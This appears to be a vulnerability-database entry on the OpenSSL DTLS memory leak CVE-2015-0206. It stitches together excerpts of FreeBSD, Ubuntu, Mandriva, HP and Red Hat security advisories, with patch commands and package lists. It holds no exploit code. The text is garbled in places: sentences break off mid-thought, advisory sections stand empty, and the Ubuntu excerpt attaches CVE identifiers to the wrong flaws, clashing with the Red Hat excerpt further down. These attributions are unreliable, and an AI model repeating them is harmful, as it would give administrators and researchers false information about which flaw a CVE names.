| VAR-201501-0340 | CVE-2015-0206 | OpenSSL 'dtls1_buffer_record' function buffer error vulnerability |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
Memory leak in the dtls1_buffer_record function in d1_pkt.c in OpenSSL 1.0.0 before 1.0.0p and 1.0.1 before 1.0.1k allows remote attackers to cause a denial of service (memory consumption) by sending many duplicate records for the next epoch, leading to failure of replay detection. OpenSSL is prone to a denial-of-service vulnerability.
An attacker may exploit this issue to cause memory exhaustion, resulting in denial-of-service conditions. The Common Vulnerabilities and Exposures project
identifies the following issues:
CVE-2014-3569
Frank Schmirler reported that the ssl23_get_client_hello function in
OpenSSL does not properly handle attempts to use unsupported
protocols.
CVE-2014-3571
Markus Stenberg of Cisco Systems, Inc. This
allows remote SSL servers to conduct ECDHE-to-ECDH downgrade attacks
and trigger a loss of forward secrecy.
CVE-2014-8275
Antti Karjalainen and Tuomo Untinen of the Codenomicon CROSS project
and Konrad Kraszewski of Google reported various certificate
fingerprint issues, which allow remote attackers to defeat a
fingerprint-based certificate-blacklist protection mechanism.
For the upcoming stable distribution (jessie), these problems will be
fixed soon.
Corrected: 2015-01-09 00:58:20 UTC (stable/10, 10.1-STABLE)
2015-01-14 21:27:46 UTC (releng/10.1, 10.1-RELEASE-p4)
2015-01-14 21:27:46 UTC (releng/10.0, 10.0-RELEASE-p16)
2015-01-09 01:11:43 UTC (stable/9, 9.3-STABLE)
2015-01-14 21:27:46 UTC (releng/9.3, 9.3-RELEASE-p8)
2015-01-09 01:11:43 UTC (stable/8, 8.4-STABLE)
2015-01-14 21:27:46 UTC (releng/8.4, 8.4-RELEASE-p22)
CVE Name: CVE-2014-3571, CVE-2015-0206, CVE-2014-3569, CVE-2014-3572
CVE-2015-0204, CVE-2015-0205, CVE-2014-8275, CVE-2014-3570
For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit <URL:https://security.FreeBSD.org/>.
Background
FreeBSD includes software from the OpenSSL Project.
II. [CVE-2014-3569] This does not affect
FreeBSD's default build. [CVE-2015-0205]
OpenSSL accepts several non-DER-variations of certificate signature
algorithm and signature encodings. OpenSSL also does not enforce a
match between the signature algorithm between the signed and unsigned
portions of the certificate. [CVE-2014-3570]
III. [CVE-2015-0206]
A server can remove forward secrecy from the ciphersuite. [CVE-2014-3572]
A server could present a weak temporary key and downgrade the security of
the session. This only
affects servers which trust a client certificate authority which issues
certificates containing DH keys, which is extremely rare. [CVE-2015-0205]
By modifying the contents of the signature algorithm or the encoding of
the signature, it is possible to change the certificate's fingerprint. It also does not affect common revocation mechanisms. Only
custom applications that rely on the uniqueness of the fingerprint
(e.g. certificate blacklists) may be affected. [CVE-2014-8275]
IV. Workaround
No workaround is available.
V. Solution
Perform one of the following:
1) Upgrade your vulnerable system to a supported FreeBSD stable or
release / security branch (releng) dated after the correction date.
2) To update your vulnerable system via a binary patch:
Systems running a RELEASE version of FreeBSD on the i386 or amd64
platforms can be updated via the freebsd-update(8) utility:
# freebsd-update fetch
# freebsd-update install
3) To update your vulnerable system via a source code patch:
The following patches have been verified to apply to the applicable
FreeBSD release branches.
a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.
[FreeBSD 8.4 and FreeBSD 9.3]
# fetch https://security.FreeBSD.org/patches/SA-15:01/openssl-9.3.patch
# fetch https://security.FreeBSD.org/patches/SA-15:01/openssl-9.3.patch.asc
# gpg --verify openssl-9.3.patch.asc
[FreeBSD 10.0]
# fetch https://security.FreeBSD.org/patches/SA-15:01/openssl-10.0.patch
# fetch https://security.FreeBSD.org/patches/SA-15:01/openssl-10.0.patch.asc
# gpg --verify openssl-10.0.patch.asc
[FreeBSD 10.1]
# fetch https://security.FreeBSD.org/patches/SA-15:01/openssl-10.1.patch
# fetch https://security.FreeBSD.org/patches/SA-15:01/openssl-10.1.patch.asc
# gpg --verify openssl-10.1.patch.asc
b) Apply the patch. Execute the following commands as root:
# cd /usr/src
# patch < /path/to/patch
c) Recompile the operating system using buildworld and installworld as
described in <URL:https://www.FreeBSD.org/handbook/makeworld.html>.
Restart all daemons using the library, or reboot the system.
VI. Correction details
The following list contains the correction revision numbers for each
affected branch.
Branch/path Revision
- -------------------------------------------------------------------------
stable/8/ r276865
releng/8.4/ r277195
stable/9/ r276865
releng/9.3/ r277195
stable/10/ r276864
releng/10.0/ r277195
releng/10.1/ r277195
- -------------------------------------------------------------------------
To see which files were modified by a particular revision, run the
following command, replacing NNNNNN with the revision number, on a
machine with Subversion installed:
# svn diff -cNNNNNN --summarize svn://svn.freebsd.org/base
Or visit the following URL, replacing NNNNNN with the revision number:
<URL:https://svnweb.freebsd.org/base?view=revision&revision=NNNNNN>
VII.
Softpaq:
http://ftp.hp.com/pub/softpaq/sp70501-71000/sp70649.exe
Easy Update Via ThinPro / EasyUpdate (x86):
http://ftp.hp.com/pub/tcdebian/updates/4.1/service_packs/security-sp-2.0-all-4.1-4.3-x86.xar
http://ftp.hp.com/pub/tcdebian/updates/4.2/service_packs/security-sp-2.0-all-4.1-4.3-x86.xar
http://ftp.hp.com/pub/tcdebian/updates/4.3/service_packs/security-sp-2.0-all-4.1-4.3-x86.xar
http://ftp.hp.com/pub/tcdebian/updates/4.4/service_packs/security-sp-2.1-all-4.4-x86.xar
http://ftp.hp.com/pub/tcdebian/updates/5.0/service_packs/security-sp-2.1-all-5.0-5.1-x86.xar
http://ftp.hp.com/pub/tcdebian/updates/5.1/service_packs/security-sp-2.1-all-5.0-5.1-x86.xar
Via ThinPro / EasyUpdate (ARM):
http://ftp.hp.com/pub/tcdebian/updates/4.1/service_packs/security-sp-2.0-all-4.1-4.3-armel.xar
http://ftp.hp.com/pub/tcdebian/updates/4.2/service_packs/security-sp-2.0-all-4.1-4.3-armel.xar
http://ftp.hp.com/pub/tcdebian/updates/4.3/service_packs/security-sp-2.0-all-4.1-4.3-armel.xar
http://ftp.hp.com/pub/tcdebian/updates/4.4/service_packs/security-sp-2.0-all-4.4-armel.xar
Note: Known issue on security-sp-2.0-all-4.1-4.3-arm.xar: With the patch
applied, VMware cannot connect if security level is set to "Refuse insecure
connections". Updating VMware to the latest package on ftp.hp.com will solve
the problem.
============================================================================
Ubuntu Security Notice USN-2459-1
January 12, 2015
openssl vulnerabilities
============================================================================
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 14.10
- Ubuntu 14.04 LTS
- Ubuntu 12.04 LTS
- Ubuntu 10.04 LTS
Summary:
Several security issues were fixed in OpenSSL. (CVE-2014-3571)
Karthikeyan Bhargavan discovered that OpenSSL incorrectly handled certain
handshakes. (CVE-2014-3572)
Antti Karjalainen, Tuomo Untinen and Konrad Kraszewski discovered that
OpenSSL incorrectly handled certain certificate fingerprints. (CVE-2015-0204)
Karthikeyan Bhargavan discovered that OpenSSL incorrectly handled client
authentication.
This issue only affected Ubuntu 14.04 LTS and Ubuntu 14.10. This issue
only affected Ubuntu 12.04 LTS, Ubuntu 14.04 LTS and Ubuntu 14.10.
(CVE-2015-0206)
Update instructions:
The problem can be corrected by updating your system to the following
package versions:
Ubuntu 14.10:
libssl1.0.0 1.0.1f-1ubuntu9.1
Ubuntu 14.04 LTS:
libssl1.0.0 1.0.1f-1ubuntu2.8
Ubuntu 12.04 LTS:
libssl1.0.0 1.0.1-4ubuntu5.21
Ubuntu 10.04 LTS:
libssl0.9.8 0.9.8k-7ubuntu8.23
After a standard system update you need to reboot your computer to make
all the necessary changes.
This could lead to a Denial Of Service attack (CVE-2014-3571).
The updated packages have been upgraded to the 1.0.0p version where
these security flaws have been fixed.
_______________________________________________________________________
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3571
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0206
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3569
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3572
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0204
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0205
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8275
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3570
https://www.openssl.org/news/secadv_20150108.txt
_______________________________________________________________________
Updated Packages:
Mandriva Business Server 1/X86_64:
08baba1b5ee61bdd0bfbcf81d465f154 mbs1/x86_64/lib64openssl1.0.0-1.0.0p-1.mbs1.x86_64.rpm
51198a2b577e182d10ad72d28b67288e mbs1/x86_64/lib64openssl-devel-1.0.0p-1.mbs1.x86_64.rpm
aa34fd335001d83bc71810d6c0b14e85 mbs1/x86_64/lib64openssl-engines1.0.0-1.0.0p-1.mbs1.x86_64.rpm
c8b6fdaba18364b315e78761a5aa0c1c mbs1/x86_64/lib64openssl-static-devel-1.0.0p-1.mbs1.x86_64.rpm
fc67f3da9fcd1077128845ce85be93e2 mbs1/x86_64/openssl-1.0.0p-1.mbs1.x86_64.rpm
ab8f672de2bf2f0f412034f89624aa32 mbs1/SRPMS/openssl-1.0.0p-1.mbs1.src.rpm
_______________________________________________________________________
To upgrade automatically use MandrivaUpdate or urpmi. The verification
of md5 checksums and GPG signatures is performed automatically for you. You can obtain the
GPG public key of the Mandriva Security Team by executing:
gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
You can view other update advisories for Mandriva Linux at:
http://www.mandriva.com/en/support/security/advisories/
If you want to report vulnerabilities, please contact
security_(at)_mandriva.com
_______________________________________________________________________
Type Bits/KeyID Date User ID
pub 1024D/22458A98 2000-07-10 Mandriva Security Team
<security*mandriva.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (GNU/Linux)
iD8DBQFUr+PRmqjQ0CJFipgRAtFXAJ46+q0aetnJkb6I9RuYmX5xFeGx9wCgt1rb
LHbCdAkBpYHYSuaUwpiAu1w=
=ePa9
-----END PGP SIGNATURE-----
.
Release Date: 2015-08-24
Last Updated: 2015-08-24
Potential Security Impact: Remote unauthorized modification, unauthorized
access, or unauthorized disclosure of information.
Source: Hewlett-Packard Company, HP Software Security Response Team
VULNERABILITY SUMMARY
Potential security vulnerabilities have been identified with HP Matrix
Operating Environment. The vulnerabilities could be exploited remotely
resulting in unauthorized modification, unauthorized access, or unauthorized
disclosure of information.
References:
CVE-2010-5107
CVE-2013-0248
CVE-2014-0118
CVE-2014-0226
CVE-2014-0231
CVE-2014-1692
CVE-2014-3523
CVE-2014-3569
CVE-2014-3570
CVE-2014-3571
CVE-2014-3572
CVE-2014-8142
CVE-2014-8275
CVE-2014-9427
CVE-2014-9652
CVE-2014-9653
CVE-2014-9705
CVE-2015-0204
CVE-2015-0205
CVE-2015-0206
CVE-2015-0207
CVE-2015-0208
CVE-2015-0209
CVE-2015-0231
CVE-2015-0232
CVE-2015-0273
CVE-2015-0285
CVE-2015-0286
CVE-2015-0287
CVE-2015-0288
CVE-2015-0289
CVE-2015-0290
CVE-2015-0291
CVE-2015-0292
CVE-2015-0293
CVE-2015-1787
CVE-2015-1788
CVE-2015-1789
CVE-2015-1790
CVE-2015-1791
CVE-2015-1792
CVE-2015-2134
CVE-2015-2139
CVE-2015-2140
CVE-2015-2301
CVE-2015-2331
CVE-2015-2348
CVE-2015-2787
CVE-2015-3113
CVE-2015-5122
CVE-2015-5123
CVE-2015-5402
CVE-2015-5403
CVE-2015-5404
CVE-2015-5405
CVE-2015-5427
CVE-2015-5428
CVE-2015-5429
CVE-2015-5430
CVE-2015-5431
CVE-2015-5432
CVE-2015-5433
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP Matrix Operating Environment impacted software components and versions:
HP Systems Insight Manager (SIM) prior to version 7.5.0
HP System Management Homepage (SMH) prior to version 7.5.0
HP Version Control Agent (VCA) prior to version 7.5.0
HP Version Control Repository Manager (VCRM) prior to version 7.5.0
HP Insight Orchestration prior to version 7.5.0
HP Virtual Connect Enterprise Manager (VCEM) prior to version 7.5.0
BACKGROUND
CVSS 2.0 Base Metrics
===========================================================
Reference Base Vector Base Score
CVE-2010-5107 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0
CVE-2013-0248 (AV:L/AC:M/Au:N/C:N/I:P/A:P) 3.3
CVE-2014-0118 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3
CVE-2014-0226 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8
CVE-2014-0231 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0
CVE-2014-1692 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5
CVE-2014-3523 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0
CVE-2014-3569 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0
CVE-2014-3570 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0
CVE-2014-3571 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0
CVE-2014-3572 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0
CVE-2014-8142 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5
CVE-2014-8275 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0
CVE-2014-9427 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5
CVE-2014-9652 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0
CVE-2014-9653 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5
CVE-2014-9705 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5
CVE-2015-0204 (AV:N/AC:M/Au:N/C:N/I:P/A:N) 4.3
CVE-2015-0205 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0
CVE-2015-0206 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0
CVE-2015-0207 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0
CVE-2015-0208 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3
CVE-2015-0209 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8
CVE-2015-0231 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5
CVE-2015-0232 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8
CVE-2015-0273 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5
CVE-2015-0285 (AV:N/AC:M/Au:N/C:P/I:N/A:N) 4.3
CVE-2015-0286 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0
CVE-2015-0287 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0
CVE-2015-0288 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0
CVE-2015-0289 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0
CVE-2015-0290 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0
CVE-2015-0291 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0
CVE-2015-0292 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5
CVE-2015-0293 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0
CVE-2015-1787 (AV:N/AC:H/Au:N/C:N/I:N/A:P) 2.6
CVE-2015-1788 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3
CVE-2015-1789 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3
CVE-2015-1790 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0
CVE-2015-1791 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8
CVE-2015-1792 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0
CVE-2015-2134 (AV:N/AC:M/Au:S/C:P/I:P/A:P) 6.0
CVE-2015-2139 (AV:N/AC:M/Au:S/C:P/I:N/A:N) 3.5
CVE-2015-2140 (AV:N/AC:M/Au:S/C:P/I:P/A:N) 4.9
CVE-2015-2301 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5
CVE-2015-2331 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5
CVE-2015-2348 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0
CVE-2015-2787 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5
CVE-2015-3113 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2015-5122 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2015-5123 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2015-5402 (AV:L/AC:M/Au:N/C:C/I:C/A:C) 6.9
CVE-2015-5403 (AV:N/AC:M/Au:S/C:P/I:N/A:N) 3.5
CVE-2015-5404 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 6.4
CVE-2015-5405 (AV:N/AC:M/Au:S/C:P/I:P/A:P) 6.0
CVE-2015-5427 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 6.4
CVE-2015-5428 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 6.4
CVE-2015-5429 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 6.4
CVE-2015-5430 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0
CVE-2015-5431 (AV:N/AC:M/Au:S/C:P/I:P/A:N) 4.9
CVE-2015-5432 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 6.4
CVE-2015-5433 (AV:N/AC:M/Au:S/C:P/I:N/A:N) 3.5
===========================================================
Information on CVSS is documented
in HP Customer Notice: HPSN-2008-002
RESOLUTION
HP has made the following software updates available to resolve the
vulnerabilities in the impacted versions of HP Matrix Operating Environment.
HP Matrix Operating Environment 7.5.0 is only available on DVD. Please order
the latest version of the HP Matrix Operating Environment 7.5.0 DVD #2 ISO
from the following location:
http://www.hp.com/go/insightupdates
Choose the orange Select button. This presents the HP Insight Management
Media order page. Choose Insight Management 7.5 DVD-2-ZIP August 2015 from
the Software specification list. Fill out the rest of the form and submit it.
HP has addressed these vulnerabilities for the affected software components
bundled with the HP Matrix Operating Environment in the following HP Security
Bulletins.
HP Matrix Operating Environment component | HP Security Bulletin Number | Security Bulletin Location
HP Systems Insight Manager (SIM) | HPSBMU03394 | https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c04762744
HP System Management Homepage (SMH) | HPSBMU03380 | http://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c04746490&lang=en-us&cc=
HP Version Control Agent (VCA) | HPSBMU03397 | https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c04765169
HP Version Control Repository Manager (VCRM) | HPSBMU03396 | https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c04765115
HP Virtual Connect Enterprise Manager (VCEM) SDK | HPSBMU03413 | https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c04774021
HISTORY
Version:1 (rev.1) - 24 August 2015 Initial release
Third Party Security Patches: Third party security patches that are to be
installed on systems running HP software products should be applied in
accordance with the customer's patch management policy.
Support: For issues about implementing the recommendations of this Security
Bulletin, contact normal HP Services support channel. For other issues about
the content of this Security Bulletin, send e-mail to security-alert@hp.com.
Report: To report a potential security vulnerability with any HP supported
product, send Email to: security-alert@hp.com
Subscribe: To initiate a subscription to receive future HP Security Bulletin
alerts via Email:
http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins
Security Bulletin Archive: A list of recently released Security Bulletins is
available here:
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/
Software Product Category: The Software Product Category is represented in
the title by the two characters following HPSB.
3C = 3COM
3P = 3rd Party Software
GN = HP General Software
HF = HP Hardware and Firmware
MP = MPE/iX
MU = Multi-Platform Software
NS = NonStop Servers
OV = OpenVMS
PI = Printing and Imaging
PV = ProCurve
ST = Storage Software
TU = Tru64 UNIX
UX = HP-UX
Copyright 2015 Hewlett-Packard Development Company, L.P.
Hewlett-Packard Company shall not be liable for technical or editorial errors
or omissions contained herein. The information provided is provided "as is"
without warranty of any kind. To the extent permitted by law, neither HP nor
its affiliates, subcontractors or suppliers will be liable for
incidental, special or consequential damages including downtime cost; lost
profits; damages relating to the procurement of substitute products or
services; or damages for loss of data, or software restoration. The
information in this document is subject to change without notice.
Hewlett-Packard Company and the names of Hewlett-Packard products referenced
herein are trademarks of Hewlett-Packard Company in the United States and
other countries. Other product and company names mentioned herein may be
trademarks of their respective owners.
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
=====================================================================
Red Hat Security Advisory
Synopsis: Moderate: openssl security update
Advisory ID: RHSA-2015:0066-01
Product: Red Hat Enterprise Linux
Advisory URL: https://rhn.redhat.com/errata/RHSA-2015-0066.html
Issue date: 2015-01-20
Updated on: 2015-01-21
CVE Names: CVE-2014-3570 CVE-2014-3571 CVE-2014-3572
CVE-2014-8275 CVE-2015-0204 CVE-2015-0205
CVE-2015-0206
=====================================================================
1. Summary:
Updated openssl packages that fix multiple security issues are now
available for Red Hat Enterprise Linux 6 and 7.
Red Hat Product Security has rated this update as having Moderate security
impact. Common Vulnerability Scoring System (CVSS) base scores, which give
detailed severity ratings, are available for each vulnerability from the
CVE links in the References section.
2. Relevant releases/architectures:
Red Hat Enterprise Linux Client (v. 7) - x86_64
Red Hat Enterprise Linux Client Optional (v. 7) - x86_64
Red Hat Enterprise Linux ComputeNode (v. 7) - x86_64
Red Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64
Red Hat Enterprise Linux Desktop (v. 6) - i386, x86_64
Red Hat Enterprise Linux Desktop Optional (v. 6) - i386, x86_64
Red Hat Enterprise Linux HPC Node (v. 6) - x86_64
Red Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64
Red Hat Enterprise Linux Server (v. 6) - i386, ppc64, s390x, x86_64
Red Hat Enterprise Linux Server (v. 7) - ppc64, s390x, x86_64
Red Hat Enterprise Linux Server Optional (v. 6) - i386, ppc64, s390x, x86_64
Red Hat Enterprise Linux Server Optional (v. 7) - ppc64, s390x, x86_64
Red Hat Enterprise Linux Workstation (v. 6) - i386, x86_64
Red Hat Enterprise Linux Workstation (v. 7) - x86_64
Red Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64
Red Hat Enterprise Linux Workstation Optional (v. 7) - x86_64
3. Description:
OpenSSL is a toolkit that implements the Secure Sockets Layer (SSL),
Transport Layer Security (TLS), and Datagram Transport Layer Security
(DTLS) protocols, as well as a full-strength, general purpose cryptography
library.
A NULL pointer dereference flaw was found in the DTLS implementation of
OpenSSL. A remote attacker could send a specially crafted DTLS message,
which would cause an OpenSSL server to crash. (CVE-2014-3571)
A memory leak flaw was found in the way the dtls1_buffer_record() function
of OpenSSL parsed certain DTLS messages. A remote attacker could send
multiple specially crafted DTLS messages to exhaust all available memory of
a DTLS server. (CVE-2015-0206)
It was found that OpenSSL's BigNumber Squaring implementation could produce
incorrect results under certain special conditions. This flaw could
possibly affect certain OpenSSL library functionality, such as RSA
blinding. Note that this issue occurred rarely and with a low probability,
and there is currently no known way of exploiting it. (CVE-2014-3570)
It was discovered that OpenSSL would perform an ECDH key exchange with a
non-ephemeral key even when the ephemeral ECDH cipher suite was selected.
A malicious server could make a TLS/SSL client using OpenSSL use a weaker
key exchange method than the one requested by the user. (CVE-2014-3572)
It was discovered that OpenSSL would accept ephemeral RSA keys when using
non-export RSA cipher suites. A malicious server could make a TLS/SSL
client using OpenSSL use a weaker key exchange method. (CVE-2015-0204)
Multiple flaws were found in the way OpenSSL parsed X.509 certificates.
An attacker could use these flaws to modify an X.509 certificate to produce
a certificate with a different fingerprint without invalidating its
signature, and possibly bypass fingerprint-based blacklisting in
applications. (CVE-2014-8275)
It was found that an OpenSSL server would, under certain conditions, accept
Diffie-Hellman client certificates without the use of a private key.
An attacker could use a user's client certificate to authenticate as that
user, without needing the private key. (CVE-2015-0205)
All OpenSSL users are advised to upgrade to these updated packages, which
contain a backported patch to mitigate the above issues. For the update to
take effect, all services linked to the OpenSSL library (such as httpd and
other SSL-enabled services) must be restarted or the system rebooted.
4. Solution:
Before applying this update, make sure all previously released errata
relevant to your system have been applied.
This update is available via the Red Hat Network. Details on how to use the
Red Hat Network to apply this update are available at
https://access.redhat.com/articles/11258
5. Bugs fixed (https://bugzilla.redhat.com/):
1180184 - CVE-2015-0204 openssl: Only allow ephemeral RSA keys in export ciphersuites
1180185 - CVE-2014-3572 openssl: ECDH downgrade bug fix
1180187 - CVE-2014-8275 openssl: Fix various certificate fingerprint issues
1180234 - CVE-2014-3571 openssl: DTLS segmentation fault in dtls1_get_record
1180235 - CVE-2015-0206 openssl: DTLS memory leak in dtls1_buffer_record
1180239 - CVE-2015-0205 openssl: DH client certificates accepted without verification
1180240 - CVE-2014-3570 openssl: Bignum squaring may produce incorrect results
6. Package List:
Red Hat Enterprise Linux Desktop (v. 6):
Source:
openssl-1.0.1e-30.el6_6.5.src.rpm
i386:
openssl-1.0.1e-30.el6_6.5.i686.rpm
openssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm
x86_64:
openssl-1.0.1e-30.el6_6.5.i686.rpm
openssl-1.0.1e-30.el6_6.5.x86_64.rpm
openssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm
openssl-debuginfo-1.0.1e-30.el6_6.5.x86_64.rpm
Red Hat Enterprise Linux Desktop Optional (v. 6):
i386:
openssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm
openssl-devel-1.0.1e-30.el6_6.5.i686.rpm
openssl-perl-1.0.1e-30.el6_6.5.i686.rpm
openssl-static-1.0.1e-30.el6_6.5.i686.rpm
x86_64:
openssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm
openssl-debuginfo-1.0.1e-30.el6_6.5.x86_64.rpm
openssl-devel-1.0.1e-30.el6_6.5.i686.rpm
openssl-devel-1.0.1e-30.el6_6.5.x86_64.rpm
openssl-perl-1.0.1e-30.el6_6.5.x86_64.rpm
openssl-static-1.0.1e-30.el6_6.5.x86_64.rpm
Red Hat Enterprise Linux HPC Node (v. 6):
Source:
openssl-1.0.1e-30.el6_6.5.src.rpm
x86_64:
openssl-1.0.1e-30.el6_6.5.i686.rpm
openssl-1.0.1e-30.el6_6.5.x86_64.rpm
openssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm
openssl-debuginfo-1.0.1e-30.el6_6.5.x86_64.rpm
Red Hat Enterprise Linux HPC Node Optional (v. 6):
x86_64:
openssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm
openssl-debuginfo-1.0.1e-30.el6_6.5.x86_64.rpm
openssl-devel-1.0.1e-30.el6_6.5.i686.rpm
openssl-devel-1.0.1e-30.el6_6.5.x86_64.rpm
openssl-perl-1.0.1e-30.el6_6.5.x86_64.rpm
openssl-static-1.0.1e-30.el6_6.5.x86_64.rpm
Red Hat Enterprise Linux Server (v. 6):
Source:
openssl-1.0.1e-30.el6_6.5.src.rpm
i386:
openssl-1.0.1e-30.el6_6.5.i686.rpm
openssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm
openssl-devel-1.0.1e-30.el6_6.5.i686.rpm
ppc64:
openssl-1.0.1e-30.el6_6.5.ppc.rpm
openssl-1.0.1e-30.el6_6.5.ppc64.rpm
openssl-debuginfo-1.0.1e-30.el6_6.5.ppc.rpm
openssl-debuginfo-1.0.1e-30.el6_6.5.ppc64.rpm
openssl-devel-1.0.1e-30.el6_6.5.ppc.rpm
openssl-devel-1.0.1e-30.el6_6.5.ppc64.rpm
s390x:
openssl-1.0.1e-30.el6_6.5.s390.rpm
openssl-1.0.1e-30.el6_6.5.s390x.rpm
openssl-debuginfo-1.0.1e-30.el6_6.5.s390.rpm
openssl-debuginfo-1.0.1e-30.el6_6.5.s390x.rpm
openssl-devel-1.0.1e-30.el6_6.5.s390.rpm
openssl-devel-1.0.1e-30.el6_6.5.s390x.rpm
x86_64:
openssl-1.0.1e-30.el6_6.5.i686.rpm
openssl-1.0.1e-30.el6_6.5.x86_64.rpm
openssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm
openssl-debuginfo-1.0.1e-30.el6_6.5.x86_64.rpm
openssl-devel-1.0.1e-30.el6_6.5.i686.rpm
openssl-devel-1.0.1e-30.el6_6.5.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 6):
i386:
openssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm
openssl-perl-1.0.1e-30.el6_6.5.i686.rpm
openssl-static-1.0.1e-30.el6_6.5.i686.rpm
ppc64:
openssl-debuginfo-1.0.1e-30.el6_6.5.ppc64.rpm
openssl-perl-1.0.1e-30.el6_6.5.ppc64.rpm
openssl-static-1.0.1e-30.el6_6.5.ppc64.rpm
s390x:
openssl-debuginfo-1.0.1e-30.el6_6.5.s390x.rpm
openssl-perl-1.0.1e-30.el6_6.5.s390x.rpm
openssl-static-1.0.1e-30.el6_6.5.s390x.rpm
x86_64:
openssl-debuginfo-1.0.1e-30.el6_6.5.x86_64.rpm
openssl-perl-1.0.1e-30.el6_6.5.x86_64.rpm
openssl-static-1.0.1e-30.el6_6.5.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 6):
Source:
openssl-1.0.1e-30.el6_6.5.src.rpm
i386:
openssl-1.0.1e-30.el6_6.5.i686.rpm
openssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm
openssl-devel-1.0.1e-30.el6_6.5.i686.rpm
x86_64:
openssl-1.0.1e-30.el6_6.5.i686.rpm
openssl-1.0.1e-30.el6_6.5.x86_64.rpm
openssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm
openssl-debuginfo-1.0.1e-30.el6_6.5.x86_64.rpm
openssl-devel-1.0.1e-30.el6_6.5.i686.rpm
openssl-devel-1.0.1e-30.el6_6.5.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 6):
i386:
